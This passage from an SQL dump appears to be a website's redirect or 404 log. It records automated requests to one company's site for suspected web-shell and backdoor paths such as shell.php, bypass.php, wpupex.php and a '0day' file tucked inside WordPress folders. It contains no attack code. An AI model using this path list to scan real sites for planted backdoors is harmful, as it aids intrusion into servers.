00:00:00',301),(54916,'http://mail.3s-technologies.com.tr/tr/smklh.php',NULL,'','',2,0,'2026-01-03 18:51:59','0000-00-00 00:00:00',301),(54917,'http://mail.3s-technologies.com.tr/tr/sagym.php',NULL,'','',1,0,'2026-01-03 18:51:59','0000-00-00 00:00:00',301),(54918,'http://mail.3s-technologies.com.tr/tr/qvaaq.php',NULL,'','',1,0,'2026-01-03 18:52:00','0000-00-00 00:00:00',301),(54919,'http://mail.3s-technologies.com.tr/tr/frg.php',NULL,'','',1,0,'2026-01-03 18:52:02','0000-00-00 00:00:00',301),(54920,'http://mail.3s-technologies.com.tr/tr/to.php',NULL,'','',13,0,'2026-01-03 18:52:03','0000-00-00 00:00:00',301),(54921,'http://mail.3s-technologies.com.tr/tr/nansa.php',NULL,'','',1,0,'2026-01-03 18:52:11','0000-00-00 00:00:00',301),(54922,'http://mail.3s-technologies.com.tr/tr/blurbs.php',NULL,'','',1,0,'2026-01-03 18:52:12','0000-00-00 00:00:00',301),(54923,'http://mail.3s-technologies.com.tr/tr/wl.php',NULL,'','',1,0,'2026-01-03 18:52:13','0000-00-00 00:00:00',301),(54924,'http://mail.3s-technologies.com.tr/tr/show.php',NULL,'','',1,0,'2026-01-03 18:52:16','0000-00-00 00:00:00',301),(54925,'http://mail.3s-technologies.com.tr/tr/cro.php',NULL,'','',2,0,'2026-01-03 18:52:16','0000-00-00 00:00:00',301),(54926,'http://mail.3s-technologies.com.tr/tr/qqq.php',NULL,'','',1,0,'2026-01-03 18:52:18','0000-00-00 00:00:00',301),(54927,'http://mail.3s-technologies.com.tr/tr/congab.php',NULL,'','',1,0,'2026-01-03 18:52:19','0000-00-00 00:00:00',301),(54928,'http://mail.3s-technologies.com.tr/tr/xvent.php',NULL,'','',1,0,'2026-01-03 18:52:21','0000-00-00 00:00:00',301),(54929,'http://mail.3s-technologies.com.tr/tr/jatuh.php',NULL,'','',1,0,'2026-01-03 18:52:22','0000-00-00 00:00:00',301),(54930,'http://mail.3s-technologies.com.tr/tr/efsd.php',NULL,'','',1,0,'2026-01-03 18:52:27','0000-00-00 00:00:00',301),(54931,'http://mail.3s-technologies.com.tr/tr/w1w.php',NULL,'','',1,0,'2026-01-03 18:52:27','0000-00-00 00:00:00',301),(54932,'http://mail.3s-technologies.com.tr/tr/ma.php',NULL,'','',10,0,'2026-01-03 18:52:32','0000-00-00 00:00:00',301),(54933,'http://mail.3s-technologies.com.tr/tr/zozla.php',NULL,'','',1,0,'2026-01-03 18:52:33','0000-00-00 00:00:00',301),(54934,'http://mail.3s-technologies.com.tr/tr/ctex1.php',NULL,'','',4,0,'2026-01-03 18:52:34','0000-00-00 00:00:00',301),(54935,'http://mail.3s-technologies.com.tr/tr/lts.php',NULL,'','',1,0,'2026-01-03 18:52:34','0000-00-00 00:00:00',301),(54936,'http://mail.3s-technologies.com.tr/tr/mmm.php',NULL,'','',1,0,'2026-01-03 18:52:35','0000-00-00 00:00:00',301),(54937,'http://mail.3s-technologies.com.tr/tr/cok.php',NULL,'','',1,0,'2026-01-03 18:52:35','0000-00-00 00:00:00',301),(54938,'http://mail.3s-technologies.com.tr/tr/admiin.php',NULL,'','',5,0,'2026-01-03 18:52:36','0000-00-00 00:00:00',301),(54939,'http://mail.3s-technologies.com.tr/tr/mcd.php',NULL,'','',1,0,'2026-01-03 18:52:37','0000-00-00 00:00:00',301),(54940,'http://mail.3s-technologies.com.tr/tr/em.php',NULL,'','',1,0,'2026-01-03 18:52:39','0000-00-00 00:00:00',301),(54941,'http://mail.3s-technologies.com.tr/tr/kcs.php',NULL,'','',5,0,'2026-01-03 18:52:40','0000-00-00 00:00:00',301),(54942,'http://mail.3s-technologies.com.tr/tr/wp-gzone.php',NULL,'','',1,0,'2026-01-03 18:52:41','0000-00-00 00:00:00',301),(54943,'http://mail.3s-technologies.com.tr/tr/cafe.php',NULL,'','',1,0,'2026-01-03 18:52:43','0000-00-00 00:00:00',301),(54944,'http://mail.3s-technologies.com.tr/tr/uuu.php',NULL,'','',35,0,'2026-01-03 18:52:44','0000-00-00 00:00:00',301),(54945,'http://mail.3s-technologies.com.tr/tr/mh.php',NULL,'','',19,0,'2026-01-03 18:52:45','0000-00-00 00:00:00',301),(54946,'http://mail.3s-technologies.com.tr/tr/wp-wlx.php',NULL,'','',2,0,'2026-01-03 18:52:48','0000-00-00 00:00:00',301),(54947,'http://mail.3s-technologies.com.tr/tr/dbc.php',NULL,'','',4,0,'2026-01-03 18:52:50','0000-00-00 00:00:00',301),(54948,'http://mail.3s-technologies.com.tr/tr/wsheet1.php',NULL,'','',4,0,'2026-01-03 18:52:55','0000-00-00 00:00:00',301),(54949,'http://mail.3s-technologies.com.tr/tr/zoz.php',NULL,'','',1,0,'2026-01-03 18:52:56','0000-00-00 00:00:00',301),(54950,'http://mail.3s-technologies.com.tr/tr/ww3.php',NULL,'','',1,0,'2026-01-03 18:53:00','0000-00-00 00:00:00',301),(54951,'http://mail.3s-technologies.com.tr/tr/yyy.php',NULL,'','',1,0,'2026-01-03 18:53:02','0000-00-00 00:00:00',301),(54952,'http://mail.3s-technologies.com.tr/tr/wp-ana.php',NULL,'','',3,0,'2026-01-03 18:53:03','0000-00-00 00:00:00',301),(54953,'http://mail.3s-technologies.com.tr/tr/f8.php',NULL,'','',4,0,'2026-01-03 18:53:03','0000-00-00 00:00:00',301),(54954,'http://mail.3s-technologies.com.tr/tr/sf.php',NULL,'','',19,0,'2026-01-03 18:53:04','0000-00-00 00:00:00',301),(54955,'http://mail.3s-technologies.com.tr/tr/ww2.php',NULL,'','',1,0,'2026-01-03 18:53:06','0000-00-00 00:00:00',301),(54956,'http://mail.3s-technologies.com.tr/tr/xa.php',NULL,'','',34,0,'2026-01-03 18:53:08','0000-00-00 00:00:00',301),(54957,'http://mail.3s-technologies.com.tr/tr/horeg.php',NULL,'','',3,0,'2026-01-03 18:53:11','0000-00-00 00:00:00',301),(54958,'http://mail.3s-technologies.com.tr/tr/xcre1.php',NULL,'','',1,0,'2026-01-03 18:53:16','0000-00-00 00:00:00',301),(54959,'http://mail.3s-technologies.com.tr/tr/ws35.php',NULL,'','',2,0,'2026-01-03 18:53:18','0000-00-00 00:00:00',301),(54960,'http://mail.3s-technologies.com.tr/tr/f-401.php',NULL,'','',1,0,'2026-01-03 18:53:19','0000-00-00 00:00:00',301),(54961,'http://mail.3s-technologies.com.tr/tr/see.php',NULL,'','',1,0,'2026-01-03 18:53:19','0000-00-00 00:00:00',301),(54962,'http://mail.3s-technologies.com.tr/tr/waw.php',NULL,'','',1,0,'2026-01-03 18:53:21','0000-00-00 00:00:00',301),(54963,'http://mail.3s-technologies.com.tr/tr/zafir1.php',NULL,'','',1,0,'2026-01-03 18:53:24','0000-00-00 00:00:00',301),(54964,'http://mail.3s-technologies.com.tr/tr/quoys.php',NULL,'','',1,0,'2026-01-03 18:53:25','0000-00-00 00:00:00',301),(54965,'http://mail.3s-technologies.com.tr/tr/o-simple.php',NULL,'','',3,0,'2026-01-03 18:53:29','0000-00-00 00:00:00',301),(54966,'http://mail.3s-technologies.com.tr/tr/sf9.php',NULL,'','',1,0,'2026-01-03 18:53:29','0000-00-00 00:00:00',301),(54967,'http://3s-technologies.com.tr/en/dapa.php',NULL,'https://www.google.com/','',2,0,'2026-01-03 19:15:11','0000-00-00 00:00:00',301),(54968,'http://3s-technologies.com.tr/en/first.php',NULL,'https://www.google.de/','',2,0,'2026-01-03 19:15:12','0000-00-00 00:00:00',301),(54969,'http://3s-technologies.com.tr/en/myy.php',NULL,'https://www.google.co.uk/','',2,0,'2026-01-03 19:15:13','0000-00-00 00:00:00',301),(54970,'http://3s-technologies.com.tr/en/spip.php',NULL,'https://www.yahoo.com/','',2,0,'2026-01-03 19:15:17','0000-00-00 00:00:00',301),(54971,'http://3s-technologies.com.tr/en/ipv6.php',NULL,'https://www.bing.com/','',2,0,'2026-01-03 19:15:17','0000-00-00 00:00:00',301),(54972,'http://3s-technologies.com.tr/en/geido.php',NULL,'https://www.yahoo.com/','',2,0,'2026-01-03 19:15:18','0000-00-00 00:00:00',301),(54973,'http://3s-technologies.com.tr/en/halo.php',NULL,'https://www.google.com/','',2,0,'2026-01-03 19:15:19','0000-00-00 00:00:00',301),(54974,'http://3s-technologies.com.tr/en/cachex.php',NULL,'https://www.google.fr/','',2,0,'2026-01-03 19:15:21','0000-00-00 00:00:00',301),(54975,'http://3s-technologies.com.tr/en/rezor.php',NULL,'https://www.google.fr/','',2,0,'2026-01-03 19:15:22','0000-00-00 00:00:00',301),(54976,'http://3s-technologies.com.tr/en/bibil.php',NULL,'https://www.bing.com/','',2,0,'2026-01-03 19:15:25','0000-00-00 00:00:00',301),(54977,'http://3s-technologies.com.tr/en/wpupex.php',NULL,'https://www.yahoo.com/','',2,0,'2026-01-03 19:15:25','0000-00-00 00:00:00',301),(54978,'http://3s-technologies.com.tr/en/caspersecurity.php',NULL,'https://www.bing.com/','',2,0,'2026-01-03 19:15:26','0000-00-00 00:00:00',301),(54979,'http://3s-technologies.com.tr/en/test/index.php',NULL,'https://www.bing.com/','',5,0,'2026-01-03 19:15:27','0000-00-00 00:00:00',301),(54980,'http://3s-technologies.com.tr/en/test/lm.php',NULL,'https://www.google.fr/','',2,0,'2026-01-03 19:15:28','0000-00-00 00:00:00',301),(54981,'http://3s-technologies.com.tr/en/tmp/security.php',NULL,'https://www.google.fr/','',3,0,'2026-01-03 19:15:29','0000-00-00 00:00:00',301),(54982,'http://3s-technologies.com.tr/en/images/security.php',NULL,'https://www.google.co.uk/','',2,0,'2026-01-03 19:15:30','0000-00-00 00:00:00',301),(54983,'http://3s-technologies.com.tr/en/first/function.php',NULL,'https://www.google.com/','',2,0,'2026-01-03 19:15:31','0000-00-00 00:00:00',301),(54984,'http://3s-technologies.com.tr/en/fonts/index.php',NULL,'https://www.google.com/','',10,0,'2026-01-03 19:15:32','0000-00-00 00:00:00',301),(54985,'http://3s-technologies.com.tr/en/filemanager/world.php',NULL,'https://www.google.fr/','',2,0,'2026-01-03 19:15:33','0000-00-00 00:00:00',301),(54986,'http://3s-technologies.com.tr/en/mtos/byp.php',NULL,'https://duckduckgo.com/','',2,0,'2026-01-03 19:15:34','0000-00-00 00:00:00',301),(54987,'http://3s-technologies.com.tr/en/blog/byp.php',NULL,'https://duckduckgo.com/','',3,0,'2026-01-03 19:15:35','0000-00-00 00:00:00',301),(54988,'http://3s-technologies.com.tr/en/cms/byp.php',NULL,'https://www.bing.com/','',2,0,'2026-01-03 19:15:36','0000-00-00 00:00:00',301),(54989,'http://3s-technologies.com.tr/en/mt/byp.php',NULL,'https://duckduckgo.com/','',2,0,'2026-01-03 19:15:36','0000-00-00 00:00:00',301),(54990,'http://3s-technologies.com.tr/en/scripts/wpup.php',NULL,'https://www.google.com/','',2,0,'2026-01-03 19:15:37','0000-00-00 00:00:00',301),(54991,'http://3s-technologies.com.tr/en/ba/wpup.php',NULL,'https://www.google.com/','',2,0,'2026-01-03 19:15:38','0000-00-00 00:00:00',301),(54992,'http://3s-technologies.com.tr/en/ens/wpup.php',NULL,'https://www.yahoo.com/','',2,0,'2026-01-03 19:15:39','0000-00-00 00:00:00',301),(54993,'http://3s-technologies.com.tr/en/ho/wpup.php',NULL,'https://www.bing.com/','',2,0,'2026-01-03 19:15:40','0000-00-00 00:00:00',301),(54994,'http://3s-technologies.com.tr/en/para/wpup.php',NULL,'https://www.google.fr/','',3,0,'2026-01-03 19:15:41','0000-00-00 00:00:00',301),(54995,'http://3s-technologies.com.tr/en/per/wpup.php',NULL,'https://www.google.com/','',2,0,'2026-01-03 19:15:42','0000-00-00 00:00:00',301),(54996,'http://3s-technologies.com.tr/en/update/bibil.php',NULL,'https://www.google.com/','',2,0,'2026-01-03 19:15:42','0000-00-00 00:00:00',301),(54997,'http://3s-technologies.com.tr/en/update/wpup.php',NULL,'https://www.google.co.uk/','',3,0,'2026-01-03 19:15:43','0000-00-00 00:00:00',301),(54998,'http://3s-technologies.com.tr/en/update/wpupex.php',NULL,'https://www.google.fr/','',5,0,'2026-01-03 19:15:44','0000-00-00 00:00:00',301),(54999,'http://3s-technologies.com.tr/en/uploads/casper.php',NULL,'https://www.google.fr/','',2,0,'2026-01-03 19:15:46','0000-00-00 00:00:00',301),(55000,'http://3s-technologies.com.tr/en/uploads/bypass.php',NULL,'https://www.google.fr/','',3,0,'2026-01-03 19:15:47','0000-00-00 00:00:00',301),(55001,'http://3s-technologies.com.tr/en/vendor/security.php',NULL,'https://www.bing.com/','',2,0,'2026-01-03 19:15:48','0000-00-00 00:00:00',301),(55002,'http://3s-technologies.com.tr/en/vendor/nette/utils/index.php',NULL,'https://www.yahoo.com/','',2,0,'2026-01-03 19:15:49','0000-00-00 00:00:00',301),(55003,'http://3s-technologies.com.tr/en/queue/350070/index.php',NULL,'https://www.google.de/','',2,0,'2026-01-03 19:15:50','0000-00-00 00:00:00',301),(55004,'http://3s-technologies.com.tr/en/.well-known/zip.php',NULL,'https://www.google.co.uk/','',2,0,'2026-01-03 19:15:51','0000-00-00 00:00:00',301),(55005,'http://3s-technologies.com.tr/en/.cache/x.php',NULL,'https://www.google.de/','',2,0,'2026-01-03 19:15:52','0000-00-00 00:00:00',301),(55006,'http://3s-technologies.com.tr/en/x',NULL,'https://www.google.co.uk/','',3,0,'2026-01-03 19:15:53','0000-00-00 00:00:00',301),(55007,'http://3s-technologies.com.tr/en/x/index.php',NULL,'https://www.google.de/','',3,0,'2026-01-03 19:15:54','0000-00-00 00:00:00',301),(55008,'http://3s-technologies.com.tr/en/.tmb/554152/index.php',NULL,'https://www.google.com/','',2,0,'2026-01-03 19:15:54','0000-00-00 00:00:00',301),(55009,'http://3s-technologies.com.tr/en/.trash7309/dd',NULL,'https://www.yahoo.com/','',2,0,'2026-01-03 19:15:55','0000-00-00 00:00:00',301),(55010,'http://3s-technologies.com.tr/en/.trash7309/f',NULL,'https://www.google.co.uk/','',2,0,'2026-01-03 19:15:56','0000-00-00 00:00:00',301),(55011,'http://3s-technologies.com.tr/en/.trash7309/fafa',NULL,'https://www.google.de/','',2,0,'2026-01-03 19:15:57','0000-00-00 00:00:00',301),(55012,'http://3s-technologies.com.tr/en/css/smoothness/images/index.php',NULL,'https://www.google.co.uk/','',5,0,'2026-01-03 19:15:58','0000-00-00 00:00:00',301),(55013,'http://3s-technologies.com.tr/en/images/slide/2025/09/op4.php',NULL,'https://www.google.de/','',2,0,'2026-01-03 19:15:59','0000-00-00 00:00:00',301),(55014,'http://3s-technologies.com.tr/en/modules/ets_whatsapp/security.php',NULL,'https://www.google.fr/','',2,0,'2026-01-03 19:16:00','0000-00-00 00:00:00',301),(55015,'http://3s-technologies.com.tr/en/modules/mod_simplefileuploadv1.3/elements/cyb3r.php',NULL,'https://www.google.fr/','',2,0,'2026-01-03 19:16:01','0000-00-00 00:00:00',301),(55016,'http://3s-technologies.com.tr/en/.well-known/acme-challenge/local-access.php',NULL,'https://duckduckgo.com/','',2,0,'2026-01-03 19:16:02','0000-00-00 00:00:00',301),(55017,'http://3s-technologies.com.tr/en/.well-known/acme-challenge/update/wpupex.php',NULL,'https://www.google.co.uk/','',2,0,'2026-01-03 19:16:03','0000-00-00 00:00:00',301),(55018,'http://3s-technologies.com.tr/en/skin/install/default/security.php',NULL,'https://www.google.fr/','',2,0,'2026-01-03 19:16:04','0000-00-00 00:00:00',301),(55019,'http://3s-technologies.com.tr/en/wp-includes/certificates/upload.php',NULL,'https://www.bing.com/','',2,0,'2026-01-03 19:16:05','0000-00-00 00:00:00',301),(55020,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/index.php',NULL,'https://duckduckgo.com/','',5,0,'2026-01-03 19:16:06','0000-00-00 00:00:00',301),(55021,'http://3s-technologies.com.tr/en/admin/assets/img/users/bibil.php',NULL,'https://www.google.de/','',2,0,'2026-01-03 19:16:07','0000-00-00 00:00:00',301),(55022,'http://3s-technologies.com.tr/en/assets/admin/login/info.php',NULL,'https://www.google.de/','',2,0,'2026-01-03 19:16:08','0000-00-00 00:00:00',301),(55023,'http://3s-technologies.com.tr/en/assets/font/bootstrap-icon/shell.php',NULL,'https://www.bing.com/','',2,0,'2026-01-03 19:16:10','0000-00-00 00:00:00',301),(55024,'http://3s-technologies.com.tr/en/assets/js/intro/index.php',NULL,'https://www.yahoo.com/','',2,0,'2026-01-03 19:16:11','0000-00-00 00:00:00',301),(55025,'http://3s-technologies.com.tr/en/assets/plugins/gmap/dapa.php',NULL,'https://www.yahoo.com/','',2,0,'2026-01-03 19:16:11','0000-00-00 00:00:00',301),(55026,'http://3s-technologies.com.tr/en/vul1/uploads/mybypass.png.php',NULL,'https://www.google.co.uk/','',2,0,'2026-01-03 19:16:12','0000-00-00 00:00:00',301),(55027,'http://3s-technologies.com.tr/en/web1/wp-admin/network/index.php',NULL,'https://www.google.com/','',2,0,'2026-01-03 19:16:13','0000-00-00 00:00:00',301),(55028,'http://3s-technologies.com.tr/en/well-known/acme-challenge/e/index.php',NULL,'https://www.bing.com/','',5,0,'2026-01-03 19:16:14','0000-00-00 00:00:00',301),(55029,'http://3s-technologies.com.tr/en/wordpress/x',NULL,'https://www.google.co.uk/','',2,0,'2026-01-03 19:16:15','0000-00-00 00:00:00',301),(55030,'http://3s-technologies.com.tr/en/wordpress/first.php',NULL,'https://duckduckgo.com/','',2,0,'2026-01-03 19:16:16','0000-00-00 00:00:00',301),(55031,'http://3s-technologies.com.tr/en/wordpress/update/wpupex.php',NULL,'https://www.google.co.uk/','',2,0,'2026-01-03 19:16:17','0000-00-00 00:00:00',301),(55032,'http://3s-technologies.com.tr/en/wordpress/wp-admin/maint',NULL,'https://www.bing.com/','',10,0,'2026-01-03 19:16:18','0000-00-00 00:00:00',301),(55033,'http://3s-technologies.com.tr/en/wordpress/wp-includes/requests/index.php',NULL,'https://www.bing.com/','',2,0,'2026-01-03 19:16:19','0000-00-00 00:00:00',301),(55034,'http://3s-technologies.com.tr/en/wordpress/wp-includes/style-engine/index.php',NULL,'https://www.google.com/','',2,0,'2026-01-03 19:16:20','0000-00-00 00:00:00',301),(55035,'http://3s-technologies.com.tr/en/wp-2019/function.php',NULL,'https://www.google.fr/','',3,0,'2026-01-03 19:16:21','0000-00-00 00:00:00',301),(55036,'http://3s-technologies.com.tr/en/wp-admin/halo.php',NULL,'https://duckduckgo.com/','',2,0,'2026-01-03 19:16:22','0000-00-00 00:00:00',301),(55037,'http://3s-technologies.com.tr/en/wp-admin/includes/ajq1s.php',NULL,'https://duckduckgo.com/','',2,0,'2026-01-03 19:16:23','0000-00-00 00:00:00',301),(55038,'http://3s-technologies.com.tr/en/wp-admin/includes/ms-repository.php',NULL,'https://www.google.fr/','',2,0,'2026-01-03 19:16:24','0000-00-00 00:00:00',301),(55039,'http://3s-technologies.com.tr/en/wp-admin/user/halo.php',NULL,'https://www.google.com/','',2,0,'2026-01-03 19:16:26','0000-00-00 00:00:00',301),(55040,'http://3s-technologies.com.tr/en/wp-content/halo.php',NULL,'https://www.google.fr/','',2,0,'2026-01-03 19:16:27','0000-00-00 00:00:00',301),(55041,'http://3s-technologies.com.tr/en/wp-content/first.php',NULL,'https://www.google.fr/','',2,0,'2026-01-03 19:16:28','0000-00-00 00:00:00',301),(55042,'http://3s-technologies.com.tr/en/wp-content/ai1wm-backups/about.php',NULL,'https://www.google.co.uk/','',7,0,'2026-01-03 19:16:29','0000-00-00 00:00:00',301),(55043,'http://3s-technologies.com.tr/en/wp-content/fonts/caveat-brush/index.php',NULL,'https://www.google.de/','',2,0,'2026-01-03 19:16:30','0000-00-00 00:00:00',301),(55044,'http://3s-technologies.com.tr/en/wp-content/plugins/hello-dolly/hello.php',NULL,'https://www.bing.com/','',2,0,'2026-01-03 19:16:31','0000-00-00 00:00:00',301),(55045,'http://3s-technologies.com.tr/en/wp-content/plugins/mailchimp-for-woocommerce/index.php',NULL,'https://www.google.com/','',2,0,'2026-01-03 19:16:32','0000-00-00 00:00:00',301),(55046,'http://3s-technologies.com.tr/en/wp-content/plugins/majapahitslot/index.php',NULL,'https://www.yahoo.com/','',2,0,'2026-01-03 19:16:32','0000-00-00 00:00:00',301),(55047,'http://3s-technologies.com.tr/en/wp-content/plugins/ocean-portfolio/index.php',NULL,'https://www.google.com/','',2,0,'2026-01-03 19:16:33','0000-00-00 00:00:00',301),(55048,'http://3s-technologies.com.tr/en/wp-content/plugins/pwnd/dapa.php',NULL,'https://www.yahoo.com/','',2,0,'2026-01-03 19:16:34','0000-00-00 00:00:00',301),(55049,'http://3s-technologies.com.tr/en/wp-content/plugins/woocommerce/index.php',NULL,'https://www.bing.com/','',2,0,'2026-01-03 19:16:35','0000-00-00 00:00:00',301),(55050,'http://3s-technologies.com.tr/en/wp-content/themes/flatsome/index.php',NULL,'https://www.google.de/','',2,0,'2026-01-03 19:16:36','0000-00-00 00:00:00',301),(55051,'http://3s-technologies.com.tr/en/wp-content/themes/home/index.php',NULL,'https://www.yahoo.com/','',2,0,'2026-01-03 19:16:37','0000-00-00 00:00:00',301),(55052,'http://3s-technologies.com.tr/en/wp-content/themes/oceanwp/index.php',NULL,'https://www.google.co.uk/','',2,0,'2026-01-03 19:16:37','0000-00-00 00:00:00',301),(55053,'http://3s-technologies.com.tr/en/wp-content/themes/twentytwentyfour/assets/css/geido.php',NULL,'https://www.google.com/','',2,0,'2026-01-03 19:16:38','0000-00-00 00:00:00',301),(55054,'http://3s-technologies.com.tr/en/wp-content/themes/twentytwentyfour/index.php',NULL,'https://duckduckgo.com/','',11,0,'2026-01-03 19:16:39','0000-00-00 00:00:00',301),(55055,'http://3s-technologies.com.tr/en/wp-content/updraft/index.php',NULL,'https://duckduckgo.com/','',2,0,'2026-01-03 19:16:41','0000-00-00 00:00:00',301),(55056,'http://3s-technologies.com.tr/en/wp-content/upgrade-temp-backup/index.php',NULL,'https://duckduckgo.com/','',2,0,'2026-01-03 19:16:42','0000-00-00 00:00:00',301),(55057,'http://3s-technologies.com.tr/en/wp-content/uploads/2023/index.php',NULL,'https://www.bing.com/','',2,0,'2026-01-03 19:16:44','0000-00-00 00:00:00',301),(55058,'http://3s-technologies.com.tr/en/wp-content/uploads/ipv6.php',NULL,'https://www.google.de/','',2,0,'2026-01-03 19:16:45','0000-00-00 00:00:00',301),(55059,'http://3s-technologies.com.tr/en/wp-includes/ipv6.php',NULL,'https://www.google.fr/','',2,0,'2026-01-03 19:16:45','0000-00-00 00:00:00',301),(55060,'http://3s-technologies.com.tr/en/wp-includes/ixr/ipv6.php',NULL,'https://www.bing.com/','',2,0,'2026-01-03 19:16:46','0000-00-00 00:00:00',301),(55061,'http://3s-technologies.com.tr/en/wp-includes/pomo/mail.php',NULL,'https://www.yahoo.com/','',2,0,'2026-01-03 19:16:50','0000-00-00 00:00:00',301),(55062,'http://3s-technologies.com.tr/en/wp-includes/rest-api/menu.php',NULL,'https://www.google.co.uk/','',2,0,'2026-01-03 19:16:53','0000-00-00 00:00:00',301),(55063,'http://3s-technologies.com.tr/en/wp-includes/sitemaps/ipv6.php',NULL,'https://duckduckgo.com/','',2,0,'2026-01-03 19:16:54','0000-00-00 00:00:00',301),(55064,'http://3s-technologies.com.tr/en/wp-includes/sitemaps/about.php',NULL,'https://duckduckgo.com/','',6,0,'2026-01-03 19:16:55','0000-00-00 00:00:00',301),(55065,'http://3s-technologies.com.tr/en/wp-includes/theme-compat/index.php',NULL,'https://www.bing.com/','',7,0,'2026-01-03 19:16:56','0000-00-00 00:00:00',301),(55066,'http://3s-technologies.com.tr/en/wp-includes/wp-conflg.php',NULL,'https://www.yahoo.com/','',3,0,'2026-01-03 19:16:58','0000-00-00 00:00:00',301),(55067,'http://3s-technologies.com.tr/en/wp-includes/ixr/options.php',NULL,'https://www.google.co.uk/','',2,0,'2026-01-03 19:16:59','0000-00-00 00:00:00',301),(55068,'http://3s-technologies.com.tr/en/wp-includes/phpmailer/bibil_0day.php',NULL,'https://duckduckgo.com/','',2,0,'2026-01-03 19:17:01','0000-00-00 00:00:00',301),(55069,'http://3s-technologies.com.tr/en/wp-includes/requests/library/a1cord.php',NULL,'https://www.google.co.uk/','',2,0,'2026-01-03 19:17:02','0000-00-00 00:00:00',301),(55070,'http://3s-technologies.com.tr/en/wp-includes/requests/library/upload.php',NULL,'https://www.yahoo.com/','',2,0,'2026-01-03 19:17:04','0000-00-00 00:00:00',301),(55071,'http://3s-technologies.com.tr/en/wp-includes/simplepie/content/type/index.php',NULL,'https://www.google.co.uk/','',2,0,'2026-01-03 19:17:05','0000-00-00 00:00:00',301),(55072,'http://3s-technologies.com.tr/en/wp-includes/simplepie/content/upload.php',NULL,'https://www.google.fr/','',2,0,'2026-01-03 19:17:06','0000-00-00 00:00:00',301),(55073,'http://3s-technologies.com.tr/en/wp-includes/simplepie/parse/upload.php',NULL,'https://www.google.co.uk/','',2,0,'2026-01-03 19:17:07','0000-00-00 00:00:00',301),(55074,'http://3s-technologies.com.tr/en/wp-includes/text/diff/engine/upload.php',NULL,'https://www.bing.com/','',3,0,'2026-01-03 19:17:09','0000-00-00 00:00:00',301),(55075,'http://3s-technologies.com.tr/en/wp-includes/assets/wow.php',NULL,'https://www.google.fr/','',2,0,'2026-01-03 19:17:10','0000-00-00 00:00:00',301),(55076,'http://3s-technologies.com.tr/en/wp-includes/block-bindings/upedl0.php',NULL,'https://duckduckgo.com/','',2,0,'2026-01-03 19:17:11','0000-00-00 00:00:00',301),(55077,'http://3s-technologies.com.tr/en/wp-includes/block-patterns/index.php',NULL,'https://www.google.fr/','',5,0,'2026-01-03 19:17:11','0000-00-00 00:00:00',301),(55078,'http://3s-technologies.com.tr/en/wp-includes/block-supports/input.php',NULL,'https://www.google.de/','',5,0,'2026-01-03 19:17:12','0000-00-00 00:00:00',301),(55079,'http://3s-technologies.com.tr/en/wp-includes/blocks/buttons/index.php',NULL,'https://www.google.fr/','',9,0,'2026-01-03 19:17:13','0000-00-00 00:00:00',301),(55080,'http://3s-technologies.com.tr/en/wp-includes/blocks/comments-title',NULL,'https://www.bing.com/','',3,0,'2026-01-03 19:17:14','0000-00-00 00:00:00',301),(55081,'http://3s-technologies.com.tr/en/wp-includes/blocks/details/index.php',NULL,'https://www.yahoo.com/','',5,0,'2026-01-03 19:17:15','0000-00-00 00:00:00',301),(55082,'http://3s-technologies.com.tr/en/wp-includes/blocks/file/index.php',NULL,'https://www.google.de/','',5,0,'2026-01-03 19:17:16','0000-00-00 00:00:00',301),(55083,'http://3s-technologies.com.tr/en/wp-includes/blocks/freeform/index.php',NULL,'https://www.google.de/','',5,0,'2026-01-03 19:17:17','0000-00-00 00:00:00',301),(55084,'http://3s-technologies.com.tr/en/wp-includes/blocks/gallery/index.php',NULL,'https://www.google.com/','',14,0,'2026-01-03 19:17:18','0000-00-00 00:00:00',301),(55085,'http://3s-technologies.com.tr/en/wp-includes/blocks/list-item/index.php',NULL,'https://duckduckgo.com/','',9,0,'2026-01-03 19:17:19','0000-00-00 00:00:00',301),(55086,'http://3s-technologies.com.tr/en/wp-includes/blocks/media-text/index.php',NULL,'https://www.google.co.uk/','',9,0,'2026-01-03 19:17:20','0000-00-00 00:00:00',301),(55087,'http://3s-technologies.com.tr/en/wp-includes/blocks/missing/index.php',NULL,'https://www.google.co.uk/','',5,0,'2026-01-03 19:17:21','0000-00-00 00:00:00',301),(55088,'http://3s-technologies.com.tr/en/wp-includes/blocks/nextpage/index.php',NULL,'https://www.google.co.uk/','',9,0,'2026-01-03 19:17:22','0000-00-00 00:00:00',301),(55089,'http://3s-technologies.com.tr/en/wp-includes/blocks/paragraph/index.php',NULL,'https://www.bing.com/','',2,0,'2026-01-03 19:17:23','0000-00-00 00:00:00',301),(55090,'http://3s-technologies.com.tr/en/wp-includes/blocks/post-comments-form/index.php',NULL,'https://www.google.co.uk/','',5,0,'2026-01-03 19:17:24','0000-00-00 00:00:00',301),(55091,'http://3s-technologies.com.tr/en/wp-includes/blocks/post-date/index.php',NULL,'https://www.google.com/','',2,0,'2026-01-03 19:17:25','0000-00-00 00:00:00',301),(55092,'http://3s-technologies.com.tr/en/wp-includes/blocks/post-terms/index.php',NULL,'https://www.google.fr/','',5,0,'2026-01-03 19:17:26','0000-00-00 00:00:00',301),(55093,'http://3s-technologies.com.tr/en/wp-includes/blocks/pullquote/windex.php',NULL,'https://www.google.com/','',2,0,'2026-01-03 19:17:27','0000-00-00 00:00:00',301),(55094,'http://3s-technologies.com.tr/en/wp-includes/blocks/read-more/index.php',NULL,'https://www.google.de/','',5,0,'2026-01-03 19:17:27','0000-00-00 00:00:00',301),(55095,'http://3s-technologies.com.tr/en/wp-includes/blocks/search/index.php',NULL,'https://www.google.co.uk/','',9,0,'2026-01-03 19:17:28','0000-00-00 00:00:00',301),(55096,'http://3s-technologies.com.tr/en/wp-includes/blocks/social-link/index.php',NULL,'https://www.yahoo.com/','',5,0,'2026-01-03 19:17:30','0000-00-00 00:00:00',301),(55097,'http://3s-technologies.com.tr/en/wp-includes/blocks/text-columns/index.php',NULL,'https://www.google.co.uk/','',3,0,'2026-01-03 19:17:31','0000-00-00 00:00:00',301),(55098,'http://3s-technologies.com.tr/en/wp-includes/class-wp-theme-json-schema-variable.php',NULL,'https://www.bing.com/','',2,0,'2026-01-03 19:17:32','0000-00-00 00:00:00',301),(55099,'http://3s-technologies.com.tr/en/wp-includes/css/dist/block-directory/upload.php',NULL,'https://www.google.de/','',2,0,'2026-01-03 19:17:33','0000-00-00 00:00:00',301),(55100,'http://3s-technologies.com.tr/en/wp-includes/html-api/wp-load.php',NULL,'https://duckduckgo.com/','',3,0,'2026-01-03 19:17:34','0000-00-00 